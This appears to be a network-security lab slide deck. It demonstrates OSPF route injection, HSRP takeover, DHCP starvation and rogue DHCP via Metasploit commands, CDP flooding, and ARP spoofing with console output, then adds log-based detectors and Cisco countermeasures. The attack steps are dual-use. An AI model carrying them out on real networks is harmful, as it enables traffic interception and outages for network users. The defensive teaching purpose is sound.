Common Network Attacks and Countermeasures
Content
• OSPF Neighbor/Route Injection
• HSRP Active Router Manipulation
• DHCP Starvation and Spoofing
• CDP Neighbor Overflow
• IP ARP Spoofing
• Countermeasures
OSPF Neighbor/Route Injection

Scenario:
- Attacker and two OSPF-enabled routers are in the same network.
- Attacker acts as an OSPF router
- Attacker sends OSPF packets to manipulate the routers' neighbor tables and routing tables
Original neighbor tables on both routers

R1#show ip ospf neighbor
Neighbor ID     Pri   State           Dead Time   Address         Interface
192.168.0.2       1   FULL/DR         00:00:35    192.168.0.2     FastEthernet1/0

R2#show ip ospf neighbor
Neighbor ID     Pri   State           Dead Time   Address         Interface
192.168.0.1       1   FULL/BDR        00:00:30    192.168.0.1     FastEthernet2/0
Original routing tables on both routers

R1#show ip route
Gateway of last resort is not set
C    192.168.0.0/24 is directly connected, FastEthernet1/0

R2#show ip route
Gateway of last resort is not set
C    192.168.0.0/24 is directly connected, FastEthernet2/0
LOKI: a Python-based infrastructure pentesting tool focusing on layer 3 protocols.
Sending OSPF packets from the attacker using Loki
Another neighbor comes up in R1 and R2

R1#
*Feb 20 08:27:58.479: %OSPF-5-ADJCHG: Process 100, Nbr 192.168.0.11 on FastEthernet1/0 from LOADING to FULL, Loading Done
R1#show ip ospf neighbor
Neighbor ID     Pri   State           Dead Time   Address         Interface
192.168.0.2       1   FULL/DR         00:00:39    192.168.0.2     FastEthernet1/0
192.168.0.11      1   FULL/DROTHER    00:00:37    192.168.0.11    FastEthernet1/0

R2#
*Feb 20 08:27:58.639: %OSPF-5-ADJCHG: Process 100, Nbr 192.168.0.11 on FastEthernet2/0 from LOADING to FULL, Loading Done
R2#show ip ospf neighbor
Neighbor ID     Pri   State           Dead Time   Address         Interface
192.168.0.1       1   FULL/BDR        00:00:34    192.168.0.1     FastEthernet2/0
192.168.0.11      1   FULL/DROTHER    00:00:39    192.168.0.11    FastEthernet2/0
R2#
Inject network 10.0.0.0/24 into the OSPF routing table
Network 10.0.0.0/24 appears in the routing tables of both routers

R1#show ip route
Gateway of last resort is not set
     10.0.0.0/24 is subnetted, 1 subnets
O       10.0.0.0 [110/2] via 192.168.0.11, 00:00:59, FastEthernet1/0
C    192.168.0.0/24 is directly connected, FastEthernet1/0

R2#show ip route
Gateway of last resort is not set
     10.0.0.0/24 is subnetted, 1 subnets
O       10.0.0.0 [110/2] via 192.168.0.11, 00:00:54, FastEthernet2/0
C    192.168.0.0/24 is directly connected, FastEthernet2/0
HSRP Active Router Manipulation

Scenario:
- Two routers are enabled with HSRP.
- Attacker sends the necessary packets to escalate himself to Active Router
- Attacker now serves as the virtual gateway.
- All traffic from User is sent via Attacker
Overview
• Hot Standby Router Protocol (HSRP) provides default gateway redundancy using one active and one standby router.
• The priority value can be from 0 to 255. The default value is 100.
• During the Active Router election process, the router with the highest priority in an HSRP group becomes the active router. If a tie occurs, the router with the highest configured IP address becomes active.
Normal operation: R2 is the active router and R1 is the standby router

R1#show standby
FastEthernet1/0 - Group 1
  State is Standby
    1 state change, last state change 00:00:38
  Virtual IP address is 192.168.0.254
  Active virtual MAC address is 0000.0c07.ac01
    Local virtual MAC address is 0000.0c07.ac01 (v1 default)
  Hello time 3 sec, hold time 10 sec
    Next hello sent in 2.704 secs
  Preemption enabled
  Active router is 192.168.0.2, priority 100 (expires in 10.400 sec)
  Standby router is local
  Priority 100 (default 100)
  Group name is "hsrp-Fa1/0-1" (default)
Use Loki to manipulate the HSRP active router
When the attack occurred: R2 changed itself to standby router

R2#
*Feb 20 12:32:13.443: %HSRP-5-STATECHANGE: FastEthernet2/0 Grp 1 state Active -> Speak
R2#
*Feb 20 12:32:24.447: %HSRP-5-STATECHANGE: FastEthernet2/0 Grp 1 state Speak -> Standby
R2#
When the attack occurred: Attacker became Active Router with priority 255

R2#show standby
FastEthernet2/0 - Group 1
  State is Standby
    4 state changes, last state change 00:00:23
  Virtual IP address is 192.168.0.254
  Active virtual MAC address is 0050.56c0.0002
    Local virtual MAC address is 0000.0c07.ac01 (v1 default)
  Hello time 3 sec, hold time 10 sec
    Next hello sent in 1.056 secs
  Preemption enabled
  Active router is 192.168.0.11, priority 255 (expires in 10.496 sec)
  Standby router is local
  Priority 100 (default 100)
  Group name is "hsrp-Fa2/0-1" (default)
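Both the OSPF adjacency messages above and the HSRP state changes leave a trail in the router syslog. The following detector is an added example, not part of the original slides: it parses %OSPF-5-ADJCHG and %HSRP-5-STATECHANGE lines and alerts when an adjacency reaches FULL with a router ID outside a provisioned neighbor allowlist, or when a router loses the HSRP Active role. The sample log lines are constructed after the console output shown, and the EXPECTED_OSPF_NEIGHBORS allowlist is an assumption describing this lab topology.

```python
import re

# Constructed sample syslog lines, modelled on the R1/R2 console output shown in the slides.
SAMPLE_LOGS = [
    ("R1", "*Feb 20 08:27:58.479: %OSPF-5-ADJCHG: Process 100, Nbr 192.168.0.2 on FastEthernet1/0 from LOADING to FULL, Loading Done"),
    ("R1", "*Feb 20 08:27:58.479: %OSPF-5-ADJCHG: Process 100, Nbr 192.168.0.11 on FastEthernet1/0 from LOADING to FULL, Loading Done"),
    ("R2", "*Feb 20 12:32:13.443: %HSRP-5-STATECHANGE: FastEthernet2/0 Grp 1 state Active -> Speak"),
    ("R2", "*Feb 20 12:32:24.447: %HSRP-5-STATECHANGE: FastEthernet2/0 Grp 1 state Speak -> Standby"),
]

# Assumed baseline: the only OSPF neighbors each router should ever form (the two-router lab on the slides).
EXPECTED_OSPF_NEIGHBORS = {"R1": {"192.168.0.2"}, "R2": {"192.168.0.1"}}

OSPF_ADJ = re.compile(
    r"%OSPF-5-ADJCHG: Process (?P<proc>\d+), Nbr (?P<nbr>\d+\.\d+\.\d+\.\d+) "
    r"on (?P<intf>\S+) from (?P<old>[A-Z0-9]+) to (?P<new>[A-Z0-9]+)"
)
HSRP_CHG = re.compile(
    r"%HSRP-5-STATECHANGE: (?P<intf>\S+) Grp (?P<grp>\d+) state (?P<old>\w+) -> (?P<new>\w+)"
)


def analyze_logs(logs, expected=EXPECTED_OSPF_NEIGHBORS):
    """Return one alert string per suspicious event, in log order."""
    alerts = []
    for router, line in logs:
        ospf = OSPF_ADJ.search(line)
        if ospf:
            # An adjacency in FULL with a router ID that was never provisioned means an
            # unknown speaker can now inject routes (the 10.0.0.0/24 case on the slides).
            if ospf["new"] == "FULL" and ospf["nbr"] not in expected.get(router, set()):
                alerts.append(f"{router}: unexpected OSPF neighbor {ospf['nbr']} reached FULL on {ospf['intf']}")
            continue
        hsrp = HSRP_CHG.search(line)
        # Leaving Active means another device won the election; on a static two-router
        # pair that only happens legitimately during maintenance.
        if hsrp and hsrp["old"] == "Active":
            alerts.append(f"{router}: lost HSRP Active role on {hsrp['intf']} group {hsrp['grp']} ({hsrp['old']} -> {hsrp['new']})")
    return alerts


if __name__ == "__main__":
    for alert in analyze_logs(SAMPLE_LOGS):
        print(alert)
```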
DHCP Starvation and Poisoning

Scenario:
• R1 is the authorized DHCP server
• Users get IPs from R1
• Attacker takes down the DHCP server
• Attacker claims himself as DHCP server
• Users get fake IPs provided by the attacker, including DNS and default gateway
• Attacker can now serve a fake DNS service or sniff users' traffic
DHCP Starvation: taking down the real DHCP server by generating many, many DHCP
DHCP Starvation: the DHCP pool is now full of fake clients
DHCP Starvation: the DHCP server is unable to serve IPs to further user requests

R1#show ip dhcp pool

Pool DHCP :
 Utilization mark (high/low)    : 100 / 0
 Subnet size (first/next)       : 0 / 0
 Total addresses                : 254
 Leased addresses               : 253
 Pending event                  : none
 1 subnet is currently in the pool :
 Current index        IP address range                    Leased addresses
 0.0.0.0              192.168.0.1      - 192.168.0.254     253
R1#
DHCP Spoofing: Attacker runs a DHCP server with a fake DNS IP or gateway

msf > use auxiliary/server/dhcp
msf auxiliary(dhcp) > set router 192.168.0.1
router => 192.168.0.1
msf auxiliary(dhcp) > set netmask 255.255.255.0
netmask => 255.255.255.0
msf auxiliary(dhcp) > set dnsserver 172.16.0.1
dnsserver => 172.16.0.1
msf auxiliary(dhcp) > set srvhost 192.168.0.11
srvhost => 192.168.0.11
msf auxiliary(dhcp) > run
[*] Auxiliary module execution completed
[*] Starting DHCP server...
msf auxiliary(dhcp) >
DHCP Spoofing: a new user now gets an IP from the fake DHCP server

Ethernet adapter VMware Network Adapter VMnet2:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : VMware Virtual Ethernet Adapter for VMnet2
   IPv4 Address. . . . . . . . . . . : 192.168.0.33(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : Monday, February 20, 2017 11:23:39 PM
   Lease Expires . . . . . . . . . . : Monday, February 20, 2017 11:33:39 PM
   Default Gateway . . . . . . . . . : 192.168.0.1
   DHCP Server . . . . . . . . . . . : 192.168.0.11
   DNS Servers . . . . . . . . . . . : 172.16.0.1
CDP Neighbor Overflow

Scenario:
• Attacker tries to flood CDP packets into the network
• CDP tables in the routers are filled with fake devices

Flooding CDP packets: using Yersinia to generate packets
Flooding CDP packets: Wireshark capture at the port facing the attacker
Flooding CDP packets: CDP tables at the routers
Flooding CDP packets: processing the packets eats up the router's CPU

R2#show processes cpu sorted
CPU utilization for five seconds: 97%/100%; one minute: 74%; five minutes: 25%
 PID Runtime(ms)     Invoked      uSecs   5Sec   1Min   5Min TTY Process
  76      134032        3895      34411 70.66% 42.54% 14.98%   0 CDP Protocol
  91       19584         560      34971  5.19% 18.81%  5.12%   0 Exec
   5        5112         359      14239  2.87%  1.10%  0.41%   0 Check heaps
ARP Spoofing

Scenario:
• R1 is the gateway that routes traffic from User
• User sends an ARP request for the MAC of R1.
• Attacker replies to the ARP request and provides his own MAC address to User
• All data from User is sent to Attacker and then forwarded to R1
Before the spoofing attack:
• User sends an ARP request to the network asking for the MAC address of gateway 192.168.0.1.
• The router replies to the request with its MAC address, which is ca01.06e5.001c.
Before the spoofing attack: address info at R1

MAC address of R1
R1#show int f1/0 | i address
  Hardware is DEC21140, address is ca01.06e5.001c (bia ca01.06e5.001c)
  Internet address is 192.168.0.1/24
R1#

ARP cache in R1
R1#show ip arp 192.168.0.3
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  192.168.0.3             0   ca05.0790.0000  ARPA   FastEthernet1/0
R1#
Before the spoofing attack: address info at User

MAC address of User
User#show int f0/0 | i address
  Hardware is DEC21140, address is ca05.0790.0000 (bia ca05.0790.0000)
  Internet address is 192.168.0.3/24
User#

ARP cache in User
User#show ip arp 192.168.0.1
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  192.168.0.1             0   ca01.06e5.001c  ARPA   FastEthernet0/0
User#
Start the spoofing attack:

MAC address of Attacker
eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:0a:b4:51 brd ff:ff:ff:ff:ff:ff
    inet 192.168.0.11/24 brd 192.168.0.255 scope global eth0
Start the spoofing attack: use Ettercap to do ARP spoofing
- Scanning hosts
- Start spoofing
- Sniffing at the interface of the User machine with Wireshark
After the spoofing attack: show ip arp and find that the MAC addresses have been spoofed

User#show ip arp 192.168.0.1
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  192.168.0.1             0   000c.290a.b451  ARPA   FastEthernet0/0

R1#show ip arp 192.168.0.3
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  192.168.0.3             0   000c.290a.b451  ARPA   FastEthernet1/0
R1#
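The before/after ARP caches above are exactly what a periodic baseline check would catch. The following is an added example, not part of the original slides: it parses IOS "show ip arp" output, pins the gateway's hardware address from a known-good snapshot, and alerts when a later snapshot shows a different MAC, converting it to IEEE colon notation so it can be matched against a host's "ip link" output. The two snapshots are constructed after the User router output shown.

```python
import re

# Constructed "show ip arp" snapshots, modelled on the User router output in the slides
# before and after the Ettercap run. Hardware addresses are in IOS dotted form.
ARP_BEFORE = """\
User#show ip arp 192.168.0.1
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  192.168.0.1             0   ca01.06e5.001c  ARPA   FastEthernet0/0
"""
ARP_AFTER = """\
User#show ip arp 192.168.0.1
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  192.168.0.1             0   000c.290a.b451  ARPA   FastEthernet0/0
"""

ARP_ROW = re.compile(
    r"^Internet\s+(?P<ip>\d+\.\d+\.\d+\.\d+)\s+(?P<age>\S+)\s+"
    r"(?P<mac>[0-9a-f]{4}\.[0-9a-f]{4}\.[0-9a-f]{4})\s+ARPA\s+(?P<intf>\S+)",
    re.MULTILINE,
)


def parse_show_ip_arp(text):
    """Map each IP in a 'show ip arp' listing to its IOS-format hardware address."""
    return {m["ip"]: m["mac"] for m in ARP_ROW.finditer(text)}


def ios_mac_to_ieee(mac):
    """ca01.06e5.001c -> ca:01:06:e5:00:1c, the form Linux 'ip link' prints."""
    digits = mac.replace(".", "")
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def check_arp_baseline(baseline, current):
    """Alert on every pinned entry (for example the gateway) whose MAC differs from the baseline."""
    alerts = []
    for ip, expected in baseline.items():
        seen = current.get(ip)
        if seen is not None and seen != expected:
            alerts.append(f"ARP entry for {ip} changed: {expected} -> {seen} ({ios_mac_to_ieee(seen)})")
    return alerts


if __name__ == "__main__":
    baseline = parse_show_ip_arp(ARP_BEFORE)
    for alert in check_arp_baseline(baseline, parse_show_ip_arp(ARP_AFTER)):
        print(alert)
```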
After the spoofing attack: try to telnet from User to R1

User#telnet 192.168.0.1
Trying 192.168.0.1 ... Open

User Access Verification

Username: porhai
Password:
R1>
After the spoofing attack: Wireshark capture at the Attacker machine
After the spoofing attack: Follow TCP Stream
Exploitation Tools

• Loki
  - Multiprotocol Label Switching (MPLS)
  - Routing Protocol
  - First Hop Redundancy Protocol
  - Cisco Wireless LAN Context Control Protocol (WLCCP)
  - Internet Control Message Protocol version 6 (ICMP6)
  - TCP-MD5
  - Address Resolution Protocol (ARP)
  - DOT1Q

• Yersinia
  - Spanning Tree Protocol (STP)
  - Cisco Discovery Protocol (CDP)
  - Dynamic Trunking Protocol (DTP)
  - Dynamic Host Configuration Protocol (DHCP)
  - IEEE 802.1Q
  - IEEE 802.1X
  - Inter-Switch Link Protocol (ISL)
  - VLAN Trunking Protocol (VTP)
  - Hot Standby Router Protocol (HSRP)

• Ettercap
  - Putting the network interface into promiscuous mode
  - ARP spoofing
  - ARP poisoning
  - Password collectors
  - Packet filtering/modifying/dropping
  - OS fingerprinting
  - Network scanning
Countermeasures

• Open Shortest Path First (OSPF)
  - Set up a message digest key for OSPF authentication
    Per interface: ip ospf message-digest-key key_id md5 complex_password
  - Enable OSPF message digest authentication
    OSPF sub-command: area area_id authentication message-digest
    Per interface: ip ospf authentication message-digest
  - Configure passive interfaces (no Hellos, so no adjacency can form on user-facing ports)
    OSPF sub-command: passive-interface default
    OSPF sub-command: passive-interface interface_type interface_id
• Enhanced Interior Gateway Routing Protocol (EIGRP)
  - Set up a message digest key for EIGRP authentication
    Global: key chain key_chain_name
    Key chain sub-command: key key_id
    Key chain key sub-command: key-string complex_password
  - Enable EIGRP message digest authentication
    Per interface: ip authentication key-chain eigrp AS_number key_chain_name
    Per interface: ip authentication mode eigrp AS_number md5
  - Configure passive interfaces
    EIGRP sub-command: passive-interface default
    EIGRP sub-command: passive-interface interface_type interface_id
• Hot Standby Router Protocol (HSRP)
  - Enable HSRP message digest with a key-string
    Per interface: standby group_id authentication md5 key-string complex_password
  - Set up a message digest with a key-chain for HSRP authentication
    Global: key chain key_chain_name
    Key chain sub-command: key key_id
    Key chain key sub-command: key-string complex_password
  - Enable HSRP message digest with a key-chain
    Per interface: standby group_id authentication md5 key-chain key_chain_name
  - Set the HSRP priority to the highest value (255)
    Per interface: standby group_id priority priority_number
  - Set the HSRP interface IP to the highest address in the subnet (wins the tie-break)
    Per interface: ip address ip_address subnet_mask
• Virtual Router Redundancy Protocol (VRRP)
  - Enable VRRP message digest with a key-string
    Per interface: vrrp group_id authentication md5 key-string complex_password
  - Set up a message digest with a key-chain for VRRP authentication
    Global: key chain key_chain_name
    Key chain sub-command: key key_id
    Key chain key sub-command: key-string complex_password
  - Enable VRRP message digest with a key-chain
    Per interface: vrrp group_id authentication md5 key-chain key_chain_name
  - Set the VRRP priority to the highest value (254)
    Per interface: vrrp group_id priority priority_number
  - Set the VRRP interface IP to the highest address in the subnet
    Per interface: ip address ip_address subnet_mask
  - Set up the VRRP active router explicitly (use the physical interface address as the virtual IP)
    Per interface: vrrp group_id ip ip_of_physical_interface
    Per interface: vrrp group_id ipv6 ip_of_physical_interface
• Cisco Discovery Protocol (CDP)
  - Show Cisco Discovery Protocol status
    show cdp interface
  - Disable Cisco Discovery Protocol
    Global: no cdp run
    Per interface: no cdp enable
• Dynamic Host Configuration Protocol (DHCP)
  - Show DHCP snooping status
    show ip dhcp snooping
  - Set up the DHCP snooping trusted interface (only the port facing the legitimate server)
    Per interface: ip dhcp snooping trust
  - Enable DHCP snooping
    Global: ip dhcp snooping
    Global: ip dhcp snooping vlan vlan_id
• Port security
  - Show port security status
    show port-security interface interface_type interface_id
  - Enable port security (the port must be an access port first)
    Per interface: switchport mode access
    Per interface: switchport port-security
  - Limit the number of MAC addresses learned on an interface
    Per interface: switchport port-security maximum number_of_mac_address
  - Set the port security violation mode
    Per interface: switchport port-security violation violation_mode
• Address Resolution Protocol (ARP)
  - Enable Dynamic ARP Inspection
    Global: ip arp inspection vlan vlan_id
  - Enable DHCP snooping (DAI validates ARP replies against the snooping binding table)
    Global: ip dhcp snooping
    Global: ip dhcp snooping vlan vlan_id
  - Enable IP Source Guard with DHCP snooping
    Per interface: ip verify source vlan dhcp-snooping
  - Bind a MAC address and a static IP address for IP Source Guard
    Global: ip source binding mac_address vlan vlan_id ip_address interface interface_name
Q&A

Thank You! ^^